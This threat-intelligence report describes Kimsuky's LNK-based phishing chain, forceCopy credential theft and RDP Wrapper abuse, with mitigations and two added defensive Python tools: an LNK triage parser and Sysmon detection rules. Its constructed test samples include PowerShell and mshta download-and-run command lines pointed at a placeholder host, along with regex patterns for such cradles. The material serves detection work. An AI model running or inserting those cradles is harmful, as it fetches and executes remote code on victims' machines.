Full Report
The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center (ASEC). The attacks commence with phishing emails containing a Windows shortcut (LNK) file that's disguised as a Microsoft Office or PDF document.
Analysis Summary
# Threat Actor: Kimsuky (APT43)
## Attribution & Identity
**Attribution:** North Korea-linked nation-state hacking group.
**Aliases and Associations:** APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima. Assessed to be affiliated with the Reconnaissance General Bureau (RGB), North Korea's primary foreign intelligence service.
**Historical Activities:** Active since at least 2012, known for orchestrating tailored social engineering attacks capable of bypassing email security protections.
## Activity Summary
Kimsuky has recently been observed running spear-phishing campaigns that deliver its information stealer, **forceCopy**. The emails carry a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document. Opening it downloads and runs next-stage payloads, including the PEBBLEDASH trojan, a custom build of the open-source RDP Wrapper utility, and a proxy malware that keeps command-and-control (C2) communication open with an external network. A key focus of this activity is the use of forceCopy to steal credentials stored by web browsers.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing via email containing LNK files disguised as documents (Office/PDF).
- **Execution:** Opening the LNK runs PowerShell or `mshta.exe`, which download and execute the next-stage payloads from an external server.
- **Credential Access/Collection:** A PowerShell-based keylogger captures keystrokes, and the *forceCopy* stealer copies files out of the directory where the web browser is installed, the aim being the browser configuration files in which credentials are stored.
- **Command and Control (C2):** RDP Wrapper together with a proxy malware gives the operators persistent communication with an external network over RDP, a shift away from the bespoke backdoors the group relied on before.
- **Persistence/Lateral Movement:** RDP Wrapper enables Remote Desktop on the compromised host and so provides durable interactive access; lateral movement beyond that is not described in the source.
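The LNK lure at the top of this chain can be triaged statically before anyone opens it. What follows is an added example, not code from ASEC or from the page: a minimal reader for the parts of the MS-SHLLINK format that matter here (link flags, the optional LinkInfo local base path, and the relative-path, argument and icon strings) plus a triage routine that flags a shortcut named like a document whose real target is a script host. The two shortcut files it checks are constructed inline with `build_lnk` for the demonstration; they are not real Kimsuky samples, the `example.invalid` URL is a placeholder, and the indicator lists (`SCRIPT_HOSTS`, `DOC_ICON_SOURCES`, the argument patterns) are this example's own choices.

```python
"""Static triage of Windows shortcut (.lnk) lures: parse the fields that matter
and flag a document-named shortcut whose real target is PowerShell or mshta.exe.
Added example; minimal MS-SHLLINK reader, not a full implementation."""
import re
import struct

# ShellLinkHeader: size 0x4C and the CLSID 00021401-0000-0000-C000-000000000046 (little-endian)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that control which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight

# Indicator lists chosen for this example (assumptions, not indicators from the source)
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".hwp")
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript", "rundll32")
DOC_ICON_SOURCES = ("winword", "excel", "powerpnt", "acrord32", "acrobat", "hwp")
EVASIVE_ARGS = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-e(nc(odedcommand)?)?\s", re.I)
REMOTE_FETCH = re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|mshta", re.I)


def parse_lnk(data: bytes) -> dict:
    """Read the header, skip the ID list, pull LocalBasePath from LinkInfo and read StringData."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_command = struct.unpack_from("<iI", data, 56)
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) then the shell item IDs; skipped here
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    local_base_path = ""
    if flags & HAS_LINK_INFO:  # LinkInfoSize, HeaderSize, LinkInfoFlags, VolumeIDOffset, LocalBasePathOffset
        link_info_size, _, info_flags, _, lbp_offset = struct.unpack_from("<IIIII", data, pos)
        if info_flags & 0x1:  # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            start = pos + lbp_offset
            local_base_path = data[start:data.index(b"\x00", start)].decode("latin-1")
        pos += link_info_size

    def read_string() -> str:  # CountCharacters (2 bytes) followed by the characters, no terminator
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "latin-1")

    fields = {"icon_index": icon_index, "show_command": show_command, "local_base_path": local_base_path}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        fields[name] = read_string() if flags & flag else ""
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut looks like a document-lookalike dropper; [] means nothing found."""
    info = parse_lnk(data)
    reasons = []
    name = filename.lower()
    if name.endswith(".lnk") and name[:-4].endswith(DOC_EXTENSIONS):
        reasons.append("document extension in front of .lnk (double extension)")
    target = (info["local_base_path"] + " " + info["relative_path"]).strip().lower()
    script_target = any(host in target for host in SCRIPT_HOSTS)
    if script_target:
        reasons.append("target is a script host: " + target)
    args = info["arguments"]
    if EVASIVE_ARGS.search(args):
        reasons.append("arguments hide the window or bypass execution policy")
    if REMOTE_FETCH.search(args):
        reasons.append("arguments fetch or run remote content")
    if len(args) > 260:
        reasons.append("unusually long argument string (%d chars)" % len(args))
    icon = info["icon_location"].lower()
    if script_target and any(src in icon for src in DOC_ICON_SOURCES):
        reasons.append("document-style icon on a script-host target: " + info["icon_location"])
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand is SW_SHOWMINNOACTIVE (window launched minimised)")
    return reasons


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk for the demo (constructed test input, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(value: str) -> bytes:
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) + string_data(icon_location)


# Constructed samples: a lure shaped like the chain described above, and a harmless shortcut.
SAMPLE_LURE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -ep bypass -c "iwr http://example.invalid/s.hta -OutFile $env:TEMP\s.hta; mshta $env:TEMP\s.hta"',
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE,
)
SAMPLE_BENIGN = build_lnk(r"..\..\Windows\System32\notepad.exe", "", "")

if __name__ == "__main__":
    for name, blob in (("Quarterly Report.pdf.lnk", SAMPLE_LURE), ("Notepad.lnk", SAMPLE_BENIGN)):
        print(name, "->", triage_lnk(name, blob) or ["clean"])
```

Real lures usually carry a LinkTargetIDList rather than a relative path; the reader skips the ID list, so on such files the target comes from the LinkInfo `LocalBasePath` and the argument and icon strings, which is still enough to surface the document-icon-on-PowerShell pattern. Run it across a mail quarantine or a downloads directory and review anything that returns more than one reason.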
## Targeting
**Sectors:** Not explicitly detailed. The objective, theft of browser-stored credentials, fits Kimsuky's espionage mission: stolen logins give follow-on access to the victim's accounts and the organisational data behind them.
**Geography:** Not explicitly detailed in the provided text.
**Victims:** Not specifically named; the attacks are aimed at users whose browsers hold saved credentials.
## Tools & Infrastructure
**Malware and tools used:**
- **forceCopy:** newly reported information stealer that copies files from the web browser's installation directory to obtain the configuration files in which credentials are stored.
- **PEBBLEDASH:** known trojan deployed as a later-stage payload.
- **RDP Wrapper:** a custom build of the open-source Remote Desktop utility, used for remote access to the compromised host.
- **Proxy malware:** relays RDP traffic to an external network so that C2 communication persists.
- **PowerShell-based keylogger.**
**Infrastructure (C2, domains, IPs):**
- Next-stage payloads are fetched from an external server by PowerShell or `mshta.exe`.
- C2 rides over RDP through the proxy malware to an external network. Specific URLs and IP addresses are not given in the source text.
## Implications
Kimsuky's operations are evolving: readily available remote access tooling (RDP Wrapper) and proxies now carry C2 instead of the group's older bespoke backdoors, which leaves defenders fewer custom-malware signatures to match and more reason to watch RDP usage itself. The specific targeting of web browser credential files underscores a clear objective of harvesting stored login information from compromised endpoints.
## Mitigations
- Enhance scrutiny and filtering of emails containing LNK files, especially those disguised as common document types.
- Use application control (WDAC or AppLocker) to block `mshta.exe` where it has no business purpose and to confine PowerShell to signed scripts or Constrained Language Mode; turn on PowerShell script block logging so that download cradles leave a record.
- Disable browser password saving by policy (Chrome and Edge expose a `PasswordManagerEnabled` policy for this) or move users to a dedicated credential manager, and prefer phishing-resistant authentication (FIDO2 security keys, Windows Hello) so that a stolen browser password is of limited use on its own.
- Monitor for outbound RDP (TCP 3389) from workstations or from processes other than `mstsc.exe`, for invocation of remote desktop utilities on endpoints and, because RDP Wrapper works by redirecting the TermService `ServiceDll` registry value to its own `rdpwrap.dll`, for changes to that value.
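To make the last three mitigations concrete, here is an added example (not from the page or from ASEC) of detection logic run over constructed Sysmon-style events: a script host spawned by `explorer.exe` with lure-style arguments, the TermService `ServiceDll` value being pointed away from `termsrv.dll`, a load of `rdpwrap.dll`, and an outbound connection on TCP 3389 that is not `mstsc.exe` talking to an internal host. The events, paths and IP addresses are made up for the example; the `rdpwrap.dll` file name and the `ServiceDll` redirection are the open-source RDP Wrapper tool's defaults and are this example's assumptions, not indicators reported in the source.

```python
"""Detection logic for the endpoint telemetry named in the mitigations above, run over
constructed Sysmon-style events. Added example; the events, hosts and IPs are made up."""
import ipaddress
import json
import re

SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\mshta.exe", "\\wscript.exe", "\\cscript.exe")
LURE_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|\biex\b|downloadstring|\biwr\b|invoke-webrequest|https?://",
    re.I)
TERMSERVICE_DLL_KEY = "\\services\\termservice\\parameters\\servicedll"
# RFC 1918 ranges only; documentation ranges such as 203.0.113.0/24 deliberately count as external here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def detect(event: dict) -> list:
    """Return the detection names that fire for one event (empty list = nothing)."""
    hits = []
    eid = event.get("EventID")
    image = event.get("Image", "").lower()
    if eid == 1:  # process creation
        parent = event.get("ParentImage", "").lower()
        cmd = event.get("CommandLine", "")
        # A double-clicked shortcut shows up as explorer.exe spawning the script host directly.
        if parent.endswith("\\explorer.exe") and image.endswith(SCRIPT_HOSTS):
            if image.endswith("\\mshta.exe") or LURE_ARGS.search(cmd):
                hits.append("lnk_lure_script_host_from_explorer")
    elif eid == 13:  # registry value set
        target = event.get("TargetObject", "").lower()
        # RDP Wrapper points TermService at its own DLL instead of termsrv.dll (assumption: tool defaults).
        if target.endswith(TERMSERVICE_DLL_KEY) and not event.get("Details", "").lower().endswith("\\termsrv.dll"):
            hits.append("termservice_servicedll_redirected")
    elif eid == 7:  # image load
        if event.get("ImageLoaded", "").lower().endswith("\\rdpwrap.dll"):
            hits.append("rdpwrap_dll_loaded")
    elif eid == 3 and event.get("Initiated") == "true":  # outbound network connection
        if int(event.get("DestinationPort", 0)) == 3389:
            dst = ipaddress.ip_address(event["DestinationIp"])
            internal = any(dst in net for net in INTERNAL_NETS)
            # mstsc.exe to an internal host is ordinary admin use; anything else on 3389 is a tunnel candidate.
            if not internal or not image.endswith("\\mstsc.exe"):
                hits.append("outbound_rdp_unexpected_process_or_external_host")
    return hits


def scan(lines) -> list:
    """Parse each JSON event line and return (line_index, detection_name) pairs."""
    findings = []
    for index, line in enumerate(lines):
        for name in detect(json.loads(line)):
            findings.append((index, name))
    return findings


# Constructed event lines (Sysmon field names; EventID 1 = process create, 3 = network,
# 7 = image load, 13 = registry value set). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [json.dumps(e) for e in (
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\s.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -c iex(iwr http://example.invalid/a)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"EventID": 13, "Image": r"C:\Users\u\Downloads\install.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     "Details": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},
    {"EventID": 3, "Image": r"C:\Users\u\AppData\Roaming\proxy.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 3389},
    {"EventID": 3, "Image": r"C:\Windows\System32\mstsc.exe", "Initiated": "true",
     "DestinationIp": "10.0.5.20", "DestinationPort": 3389},
)]

if __name__ == "__main__":
    for index, name in scan(SAMPLE_EVENTS):
        print("event %d: %s" % (index, name))
```

The third and last sample events are deliberately benign (an administrator's script run from `cmd.exe`, and `mstsc.exe` to an internal host) so that the rules can be checked for both hits and misses; in production the `ServiceDll` and `rdpwrap.dll` rules are near-zero-noise and worth alerting on directly, while the outbound-3389 rule needs an allow-list of jump hosts.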